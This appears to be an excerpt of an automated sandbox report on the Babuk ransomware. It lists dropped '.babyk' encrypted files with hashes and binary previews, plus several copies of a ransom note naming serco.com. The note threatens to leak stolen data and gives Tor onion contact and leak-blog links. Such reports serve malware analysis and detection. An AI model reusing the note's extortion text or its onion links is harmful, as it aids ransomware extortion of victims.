                                                                            Preview: .3..L."9Kd...J;..... \....is.!e.Q0.DY.*$.(.......5.U..LfM..b.^.....).@4.;Z..L...|..S0J8.+..$=.t.j.OF\M.'...R".bZ$.....5..oD.GRV&.2..gn.@.+...(.@.......($.*....9.1...../:..uX.m...M.7......a......>o.1v.Hb.+.60D...@8........8...j7hn.......p..P..m..f......#..'O..^K_..P.>..2.6...n.nT%.............b..p..o.....^..|.}....#.P.+/f9`......i.y.=.>l*...+o._.B.3.Z..f@x./G....I..<.=GCT.jd......!...(.x.$~k.W..F3VC...=`..Md<.@...-.aH.AA.{..7...=N'jp<m..Zi. L......I...8....L.<.b....5.2X..M.VU.x..........g...u;...}.Sb....&.K.|#E...z.CI..e7..HL.>..-.P..(b...5..,..S).T'.p.Z.....m.y^c.o...R`..._.>./.8.T..W.Y.......L.).....Ubj.^=....(n..zU#:.B..G{z. k.zh."q.*O....M..lIM/....%.oS.["..h.Y...`P....@...f[.....)p....y.o...g.S..31~...t..h!.F.=.b.<.....n}odS..=*...`.......XyDO..m(.n.I.......A)..sG.b..{..#.)....8..,.d......A.u.mA'eB..o.../......D+..F.(............-.`.....c3^...j\.A.:`d..7t...g.$.E...[[.c.r.H..`=.FF.W...?...l......\....v.../`.0so{)+Z.w... '...{2Uj...T......K
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_082319_1314-414.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93814
                                                                            Entropy (8bit):7.99772050097407
                                                                            Encrypted:true
                                                                            SSDEEP:1536:1I61cQfx9kDqxSM7W71b0bcbztv4DeXIhY0yE81Fzn5nZwArditfNAZr:1INQpGD07c0bcntQOF1FznTx/Zr
                                                                            MD5:744F7F0EEA07BCBC66A33CA5275EA878
                                                                            SHA1:664B621DF473280B725A2D87FE2ADBEBE35D1581
                                                                            SHA-256:492CCA5F21EABDE8A0752971B12DD3A72BA97DDC3CDA8DE7171A49DF39D7D720
                                                                            SHA-512:2022295C469219CE2BB2793885176E827BB80E567C7F755F8AD651186FA661F9C876C7C5296D68B26F986E744A5A44BA46E4490A2FA68A4CDC7D6B9D9E2142E7
                                                                            Malicious:true
                                                                            Preview: .).H.C.x.R............Z]1...).....%..NA....K..:...DZ..~.cs..........).qsc)........(.sGC....N..*nq.Ja...-. .....5(q.z.I...k..R'z....>...B.p......X.u\..o.i..cv.}.ax"..v.Q}.|.W....ni.Z...T.A.2......l.L...JI..5.w*>oq..XD..=]...q.f../!.Cu....5.......i.f.P.....`...e?..q......vW....aB..~V.O..2....!.>.bj..;.b..........F..x.-.@uk...8..0U..%d.>(....T....Z.J%....l......JVF~..[..sJ.V..].r..v.!=;.[..*...Q.....W.!..Y......{M......q....b..`{.....;fq.....u..0./K.]-...c.....q.x~.t.'...J`...l".T;x....H.I.D.Y..H...w.K~.......g....Gw;..p.D...0."..i.X.<{.z.\.a0Q..A<..7.Z.....:...}..~X\...._..FZt~9tn\`.K.P..C....0..0.y..P`>f....Vb...t.,Q..U..'..G.......d!8...Vag4.m .1.Y.n..\.I7..q.W"c..hiC..uU/=....J.w....c..X.........'.5g.^1...6.Q..F.~........'..j!<Ol.QI(T....2..j.5C+...B.].+i].k.FM"..2.....~...k..}.V.{iJ.8.y..3&D.......P.L9K...,..$.d.S..[.}.E.H:.+.b.......;..z...{...&.~w2...L......_H..Y.....I.gd...../..HGh..$.....\.I..I...r..`k(.{?e.R....xV"."....r%.!.._C#
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_074907_15c-410.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93160
                                                                            Entropy (8bit):7.997973714489346
                                                                            Encrypted:true
                                                                            SSDEEP:1536:Mr0tOGlEQFVY0r7x6VYc6N1NyUrjLgT62fUfbG2z2YlmJsXsRWalYvk:t1lV3YmNYityUXLQ3sfbGLY2gaMk
                                                                            MD5:088BCC22DD35CF7439BB9581A0E51A76
                                                                            SHA1:233671BE4B1D12BAD00EA5B2FB52641441BE23FC
                                                                            SHA-256:A076168BFEAA927E079F86BDF772359E16EC66AEB15A1FBDFC5F8F3D8AF5A48A
                                                                            SHA-512:EF6158431AB1302B1E35642E9E0B18FD935212681E8EFDF89757BFF50F69F427CAD617D2C6AC63206E6274ED86B2F5636A673744FF8DF5D8F23EB60B7A64FCD4
                                                                            Malicious:true
                                                                            Preview: ........R..9...p.v.R..w.....3A.n.2;.@...'.(.Z.Q...WY.....[^.._.\p.|...{].T.............>A.$2.....2.9o.".z]3..........gBG3AzX.......tNK..1......".k.q..]....>.]....v...l.z..t.S_A.........a......mT~Hmxh.H....P.:...o.T&...7...I.=..&.)..=......U......#.8-..*..'.?.......Ik0$..@..#..+.)..;.8<.1..rH.k..A....l.................L.x.../R.Ba...._H&%`..>MA.MBu.F...t,..._RL./(....C.K.o.[9u.u...:.Y....?....;.?.g...\.'......H~.ba%.$r>..1.%....}1r.k.......,$.FbR.'"...T .......X.d].G..R.&{].....j..A..V.Bb../.B~.....N..$..E^........o....Fc.;.J...6W.zu9..,AVb...J....2....H. ....x...Q...;.O...,]XK...Z.i.. ...+.o.].$.....L._f.M.F.(x..7...q@XE..a. ...n.Uo..C....7..P....$.....z..P^....xe-.....mC.3].s.....S.......C..9.xQ..Yn.?.W.....'......A1 ..Y7..W.\.L..aG.e.+.+.YCJ..-*.........l..........M.-..I..J....,6.....wsu.PHk)1.o ....i6..Ucf&.....1^.S..r.(.5..}.'..l.......a...Y.].N!.x...!a_.O.J...,...8.yK...s.....S2..O.Z.3.^m3.iy.@R..|.|.....fA5......
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-08-26_080226_b58-b68.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93548
                                                                            Entropy (8bit):7.998136124711158
                                                                            Encrypted:true
                                                                            SSDEEP:1536:G7XOJDzpOr9L7CdG7U+TTSPxvW7Gq83Jz9bz6YH/mqfXNBt9e8+OrzgSx26IoOKr:8QzAZCdcSP+Gqebmm/mqflQ8+Mfx2COG
                                                                            MD5:BE283A2DD601C6D1EDF68E85AE4DB1EE
                                                                            SHA1:8AECA4F4FEA74C7C819F4746042812DFFF3BD0A6
                                                                            SHA-256:CE8BC15361AFF82BBF3539A3F7AFAFA5B22DDEB298773D1155929987949828AC
                                                                            SHA-512:1BB07F33F24D52D4C694E5A29CB360617D3EAEC452C75581B293D4B725A2A446515C37CC59793EC5F337474F9A19BF1E2221CAC226B564753D1FED9D3803BB5A
                                                                            Malicious:true
                                                                            Preview: ...S......:.xF...yl. .c.#dWeh..|...ft...wAe&.D.....W..[..tf...cE.$.J....`..>....B...~RJ:k\.fz..c.i<.R#.g.Y...6...n.>..w.[l..W..q..h.S...V.........vc......p..U.O.o,.j..xB.`.w.1..D..yJ..xGp...;..a.D6.Y&................P.....m4T..4...2W....o.s.p...`.....$.....u..{..v,...w..pd.yx.5f.(...S..y>..g..o..=.M.pD..hh'+.~..?+.B...p\s..E.Z*.D...%.Zv......OS.F;..Zi~.y..k.=..]Qs......?.bB..{.).E07....b.g.Pby.`..eb..B...f...e.v.Bn..-.J.e...p.%.o..4j.....)....n..~.C..E.=.iu.>.."........N...;..|..a...........Y^..w...q@....(.Y......$....<`&.N.....7......(1..K.Pdj........8..QST.?\..q.....:..S..".*.W......mN....m....$)..Z........I....Ly.V.E..._"...@..MKX.j.....;.1-!.i..&....}.vk...L.G.....c....{.H.:...DP......uL;...~.x._....-x....V..........!....w..+....2........W...0d/5[..^).v.{g.sI......`|..8.._.W3/X.....R.WQ.....gj.m.6o..........O..6.z*..B..=!..R!M....Tw#.~.8..k.8.@>...|.........].IX.F.d.Fo/\.m!...j.d.VK...b.^.....:...../H....(.:+.z..&GFY..\.1..+r..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_082318_17d4-1694.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93548
                                                                            Entropy (8bit):7.99808798619532
                                                                            Encrypted:true
                                                                            SSDEEP:1536:FBVmxvrL0OdW5VSngUcQq/UfBowzr1/jJAa3gdzwQqLPXnK+p4ghNRBcRt9:7V4vroTggUcV/iPV/jJ/szwQKnH64Nyn
                                                                            MD5:74CB59F205E212063B9344754BD547E5
                                                                            SHA1:7519F0D7FF21EBC715E57C0659BA425909D36111
                                                                            SHA-256:6D6367450488D86B8289DD153873B1045176C116FC1B7AC057ADB7A85620A585
                                                                            SHA-512:7CC7B717D712CC9CFDABBBD02EF79B22AD17922944F2AB53B6734631AB5BAC348051CCF604B69B30A44EAEF9A1C536A652C042FC445063AC22D43B4F50DDB83E
                                                                            Malicious:true
                                                                            Preview: .....4.+?1B...<].....:..5?....7..-.........vc.Wb+Vq..........I....P...GM.B..E..=a..,.".....q;.X-r.9.b.......@...r_..].....g..G...H...>=z..=....Y>..=.6....T..44TC@r.%...X..\#&'.3-Q o.SEX......p...j.22~.....u.....6......geW.X(..".=.1.W..Vf...?PgX.!V.'.pl.p...H...G..@...,AQ...P.[...$/;/O......+..#I..(...t...0ro$..G..........{.......A.d..y.....ufBZ.GX..!.......Q.dMlG.8.+.o*.vOk-I.K...Q..~....J............y..e....v......E...VK..,.t{."E=..D}...o...y>~......}...o#..?o.Kf.^.[...R.~......eU.Q\...F2'........XF..)..9..I.-4...z.6...1.Q..M.4..._....,c.8XW.d....6......z.`{...u.........O...3...:.?..#.].;.o...9..-C.l.c'.N...=#..v{....p?.P...... .f.....S.2.t...D~9..5p..6M...{,ptX..H.$...S..:X;f..&...#%. .4..f...i/"i.W..."..J....$.u..Hk.]h.X...........}.~....Va..R.)).5..EM.LYx.....e......%,..N.....%.q3pF.+..........l3c.8b.3..].C....Y..`...Q.&.*.w'..&...i...c8...a..%6..=[Sq!#...n.J.A:.nEm...+..........Dg$Y.....2.3#.W..HM....*x......l..&.C....3.7pg.q.z.>4..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_125339_1b84-1b30.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):15182
                                                                            Entropy (8bit):7.989215816220054
                                                                            Encrypted:false
                                                                            SSDEEP:384:4BAHbExtUtIzldGCbxrsKmBhDpVY0sCsbLwzR:4YIXUtIzmCbx8vDplnlR
                                                                            MD5:2BC974B07F3B086B00293258D5F1A20B
                                                                            SHA1:73D671162D3801F6A4B51A88FC7BB7AA1644D56E
                                                                            SHA-256:1BACE2DBB3EE6B5F98DD738979DD23DEE407C53A24CF99BA5D0909D548C2EAB8
                                                                            SHA-512:4CD234C321DC090570DA8582081FA88D56039F5E37AAA04EA4A2268B63C64ADE5DDA6AAE4F268B65287D98250B4B59BD238AF1DCEF27D6017AA8BC8185E46AA4
                                                                            Malicious:false
                                                                            Preview: ..Cl.E.d0b.j.;..!wEK....R..k..Z..g?B..@.s5.=..\..#q_...:M..X../..L.W{V...1..,...z.>..^..{.?P.....L..|&.0.i..+.{.:...._.A. ...p..;.......S11...(.}..<gq....YZ%.h..cg...2K."..w^..Yu1`..O.(.l.pG.T.\;{?..x}.e.m.8e..4..6.wV..D...(.p....Ri. ...',|......`H(.].....,.....{..,i.J.m.....L\...D?.>..m>o..WB(....R....w...]....c...J.x..K`.,:...D.....w...x.;.7.H...2G...W.P........Gr.2.w.C....N. n...].....T.w.....e......8...F..g....o.^.J.xH"}4..(y.k.. ..EG....X..."x..LJ.5..L..g....Ptga..uA....B!.....H.bN.%...^..2.c.UR...e*...sh...@D.6...R...iC..FM.3...\.._J.....;.=..T<..(..|.4<.,.;..>:.\4...|.Yz.|."*".J..i.qqX....V.s.^}P.0Vv.%c........~w.M..?.gq...9U.X.....l...A...R*..VNw(R*.}....,W/GD..a-..$.....b.+w.*.........tEe.i-.9.B.........Y[..|...X..9.....rK.fOPyo...,...G.e....^..k;._....<k.+b.O.)r..t...D.Y.....^#........HF.x..^....B.s.+...X../}LR....m..i.:...2iW.M.....Qke..P......B..B!..`@.%..sOh......v`~.H.I...[....[..G..wdcL.3.eF.M.O..0.....:.`kd...d.9.*
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_195441_60-6252.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):21002
                                                                            Entropy (8bit):7.990830822476722
                                                                            Encrypted:true
                                                                            SSDEEP:384:LS/EFLHF9b/u4yvaZbGNribxOvx5em0DhsqyXit4Kgstc+26SQDbsNMoh:kEFzF9b/Gvy0iIY3hNTg5+2SDqMoh
                                                                            MD5:8568A3A2CEB614FF7BF84D84566D9EE5
                                                                            SHA1:C80078E851B3160CB416C7F964EC9744AB87664C
                                                                            SHA-256:CC3131B489203A87905C72068AFD5AABA18F387D74CFB1B9BCE7681F09B3C4F3
                                                                            SHA-512:00D0389EF7ACA7286B75B53746DC28A3FC7E4C3CD4E4DE70EB36A695B2AAE2DCE320B5D1A35D879A1FC0B3A4202CFF06F429F6C719A7EE11846D6F6101B3808E
                                                                            Malicious:true
                                                                            Preview: .(......iHJhW...xJy...|..5........-......q...Q+J.T......$.<.1&m.g...0...)7.....`..N>u'..Xc...b.J..`JI..,.z......+h.m.OW$G.m......x.v.}.......m..89........U?.......~^r..B. N.i.^,n.H@.A...y...............8.......'K...........$v..t.nu{4...'.kX...*.+c..A.|U....7d`.d....#...A+Jv.c..N<.....mG...h:._... ..En.$..9#..K..r.................6...7.FvH.y.Jz4D.....2:vH....(S..n@I7.(.1.>s3`!...XI.h;.<.;.P...Z..L#O.....T...;.....p..h.7...B.B...a..Z>.'0ru.Z..5.pD1y.7...X.....yd\Gp%...G1.f.L.4eL..>..^...@.$...Z.j."....:KS..M.[.....h.K..c....Gm.E.\#].r:.U.s.(.'.w....H(...T*.-.[A#.E......v\...a[#mS.B.-....<.p(].....k......P.x~.........3....py]X..#.a...l..p.....k..!..{....-_../.3.).U.S.H...e....g6.{..S.k.~......Te......0<t.C....;_..$.a.z..[..i$..g....Ue..ZH.Y?.F..4.;.H.Jb..^.:.ZK..L..0.;.@...My7...G.@...lh.}..h..X.........@.5n..q_.%.9.zB...T...O.eR.........$Fh.=..$..0.t.-......n.bM.,....K.4........f..).T8y.i.......!7....6........_..et.{..n..../G..`.6c.C..P
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):20648
                                                                            Entropy (8bit):7.989929713887123
                                                                            Encrypted:false
                                                                            SSDEEP:384:FcBswkSqdBfSxtZY1Nqu89+5Dk3PV7+XBrheoZA1dxOA1:FciwkRfiS189l3N7KBteuA/xOA1
                                                                            MD5:0A158E27D7355B8237F6319B36F81176
                                                                            SHA1:100C000C633F979B94125158AD84A03168A5E2D9
                                                                            SHA-256:5536BE40F6B4DC3A46AD4D51118D1CBA807F18F34B71D491CA9AE0CC0B19E911
                                                                            SHA-512:DB345DA303DE8E9CE1A42A4B2B9FE8168FCB386EEE51FB6693978F4E9B88EB49A1AC44F1F18379B37170D6BB755B5D5DCC85ED791A4FA57F1CC458B6DF7BB7D7
                                                                            Malicious:false
                                                                            Preview: ..>.kH>..Y..e.O9......c.I.k.F..U.....J.e@...........D.|...{@u....v,y.@C.F..........9@gD.h.........&D,fKM}%s........!t}...R?..T..Y............Q.......b.g%w.>X..F......N....i.I.ZY..x.^..>L....uka..3...S.....{....@...\...K|/W.......e..|..&....\2......W..j..I.....3.MQ28M.o4..Zt<[.bZG?`....\...I4b.>.}.0A))..5...J&u.....;.i.....A./.....6.n.cz...YG.W_.......:..c.Mf....-.....^...ZR.....C.Q..8...t.,.. .g....1..K.S}Fky.$...v...4.5^}.<...!'....c .............d......&j.......b<.].7u..X2h......IBt%.L..c.....%(R.aB ...E.Q.y...Dj.W.p...a...9....u.A.:...o[:[8........`l/yI..onn..).]hL]...j......*n.~.E.s.&N~.i..jD.<......%......n.......5.|AXFx.>.Gc...Xr...|{SM....I...S -.....Q*.j@=....e=.F#.......R........m.)...r..zp........q..8:V......L....4....].us......|~..... ..T.4.r..X..7..-.w......*{s.....H9..X.|..F4.U79...6..PPX~q\l.VHr........=........[2J.....3............W....".A.1.`.s....9..v.-.w.....Ye.......k...&...........f.R.;^Q&..j..ud.-I.a6...++U8.t.....W..)..^.;.. .t..`
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):20648
                                                                            Entropy (8bit):7.991160755475869
                                                                            Encrypted:true
                                                                            SSDEEP:384:x54jXCJK4KrfWeSZ3KapygAj1+vTQpVl8PeiGjQ/X8SIRr5gByQ:vTJbe4Kagnj1qQqPPf8SIRlWyQ
                                                                            MD5:0D780C734F66355D6D0D2F0799B2B258
                                                                            SHA1:6EE05CF41C34B6A906041E14B17107E0924D7A5E
                                                                            SHA-256:7AA1D9425AF75708A4384F181919970FCC5D8022A533E1A7B3521A3740C973A6
                                                                            SHA-512:D6B715013DE682823B4DDDA0FB26A9C958EC3EF41C98BC1408EDE8AAA5A67FB1A373C9B017D07D32967191510D77249B87B8629869F5C249B784038358027AC7
                                                                            Malicious:true
                                                                            Preview: ......JWN.....+.6.1lQ*.N......ex|.k.DB...4}.$0.%5U!XK...p..}.....o+..gb...F.~f..:d.gW......d=v.\...`.g.....N.e.......d.:.z.......z.fO"....5.2.]...t}.'].}.r{....O.3..u..t.!...-...$z.-S...#.e.h.....Q;..(;.:.a...|.....*%..+.o.<.-W..e? ...e...9..K.b........i7@.Bm...f.....T..Z..].....x...~...8vX3...0..7~...)G....@9......[.../.....x......|.F..4w.F.+.zf.)r.xVl..,;.....4.......6N...........0^...5...0..d..(....... ..Gi6...6..I.x&F..I..2..;;D....X&....(.....I.a.......R.<..a\.n!Y....M...X.q34.....q...92Z.....DI..6.n..R..o.B..z.R..q.&6.w..7.7o......@$9.....t......-V")L.DJ.J@+....%...j.0...e..........C.......&b....`;...k.ml.7..i....")=|.X.....Ki*O..<.Ld..d..5...............JnXc.:L..^.?c%................!.QB.4.#:..'.........H:.}[....G.....k..vd|.......{R......e...&.i.dm.F...6.S.....C..:...D}:g....b`..F...$..LT`.5.\..|.1..4..$..g.?](.N..-4;..Y.7..5...}R..#Ua|...!..yZZ....C.._..<.IG@..mHQ......6..j.....U.k..u...`...euT.d.UV_.76.....n...R...f#r.....{....
                                                                            C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1152
                                                                            Entropy (8bit):7.849028939215543
                                                                            Encrypted:false
                                                                            SSDEEP:24:u9kpRChzvi22RmeUzYYiosuCyAHs8kBBqsm0kuyunFSV:J2bfQ+MYGFbRkw0m
                                                                            MD5:B537BDBD8A8D2609AFE810FF4604CC44
                                                                            SHA1:95C4B5F3F9AEA695978214C88C47DB220E6DAE63
                                                                            SHA-256:DF41AB7134D5411A7C5D23BE421FC74775A7D200CC21F050A50EB863D1BAE98C
                                                                            SHA-512:DDCD1B8380BE701BB2AA5D92B3843C7783CC7801425B7481C181BE51532D970262A6643CC45F65691FCE848AA5DD1EDC4FDBF37CF055DAF9308A1CE80EABAFA6
                                                                            Malicious:false
                                                                            Preview: &.......yj.n....D.....6.l.^-+.7.t.sc.fL.......!./..a.gv..8......+5.[...Xc.}.s..........g...U..R,O....j. ,....7.....B.nB@_3......\....V..%....^}rN....^..X..$;..B.mMY.:]=V8..8.Ia....q'..b.o.TB....;......8c*..p.}....2..0...i.~a."$..?..9{&..8_...y..r)..>.X.c.L.o.J+..O.l._+a........^..I&...p.B..2..J.x%...p....<z.p.B..$z..19}.I5..2,Y.V...'.....rz.E....;..-.P4....E|......r....Z...V.k4eU=........X..8...........l.......*..|.[Us.S...LA...e:.UvRu>.U..M...J.?A..r!..my.....$YY....@..=. ....D...Y.S.....$.T...#.>.....-.......\.C..?.[eIE.;11..?.%..NQ.U...Z...VO...~...W!.....P1.j..../...dnK.D........jX'..$zM..O. ...t.~g.58.....).OZ...H....;u..p#p..{....6..N.H!.....pj.x...b.\|n=r...$.u. 8..4...R.s../..]|.`....$\..K..\..@....%.@...P.K.E......u8.N..t.Z.V.b...W..v.$.1...y....1.7{r5uo....Pw.'...H.<M6..../.....p.k...oG4#....... 4.E...n....~G.....j..../\...RE%...?...@..H.+Em..wm(T..&....3E?..2.]\.G.... .7.Q?....8ZiB[...V.......L..>c4...H.....v....y...{.i.CV.%
                                                                            C:\Users\user\AppData\Local\Microsoft\PenWorkspace\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\PlayReady\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2852
                                                                            Entropy (8bit):7.936797819245317
                                                                            Encrypted:false
                                                                            SSDEEP:48:cC0xfNXJmH8VbVgC/9pRSGVpFNVZMxO28KsiUeptRQNK6dYgpwOmUBLDMA3S6ddf:WVXJNVgC/9pgGVpXVOfsitRQN/YgpNXp
                                                                            MD5:B3B44741439BE13CA08F6616B988487C
                                                                            SHA1:7EA7CE85C91EF25A3B6E61B1A4E6F7BADFE6411B
                                                                            SHA-256:2C25035AC477996ECEFEDEC5D10491D2DD0603635F11ADDD62A273F5C8CDB1B1
                                                                            SHA-512:60F92A360F67C6514BC042B598B448C5F069EAB7D5CA8D1145A1F1D1A953B8E8C3732D1F00A59C36D753BCFC73B352EC89642683F623DD7F9E5C64B6D0A858B0
                                                                            Malicious:false
                                                                            Preview: ...#..%..Uw.b.....'7.j}l%O..u..).."....@..?..y..2.7d8F>.='-._...o..........A)...D..F.Ic..DX..'q'F..!f.m.]..&....s...o.~.^...^@....Tw..69.57.cw..].B.M.o.H? 5(......*A.*..1.>..EHv[....a}.G....."(y_.CQ....,.....--.7`@...p..]Rb.Z.9T...#E..-_...=..s.h.....E...0_j..J.e.....]W..../.$A...G>@..zB&B.....3...A\.-....L_.~Cf.+jv.2<.,.LE..@r...[....kX=P....k.t...e......;.._..`...Z&.....}..i2.\0..q..:y..lu(...i&zg...W]"(..~...99....O.m..e.w...F.xe/.......|..}..Y..qG0.#.IU.+..)3.t.S.Y$....`...x_<....&9.....d..@..+...r........C[.^#..eb......[(....y...V.....8Aw=...@...xu..M^.5Q"....x....g.#5p..6!Xz...}4<..T......v5..=........5...)lhG/.v.....`b....,.h"..N..i[...w..........o.P...K.~i[3...F.g9..g..?nc......#...<......@=l}i....2..3...R..n.:j8$g..P),5....c......nH....$M..XE~rH...n......$9WV.tu.....z...Jo..wgt3J.1..!.D\..9..a...TC.....0..m..4{j..c@.h].o..9..v.Y`.r....-....%........Rx>....v...{p...4.4...N.....\...!...B.@.8|Vc)q... .rl.o..M....z>p...7........f...
                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
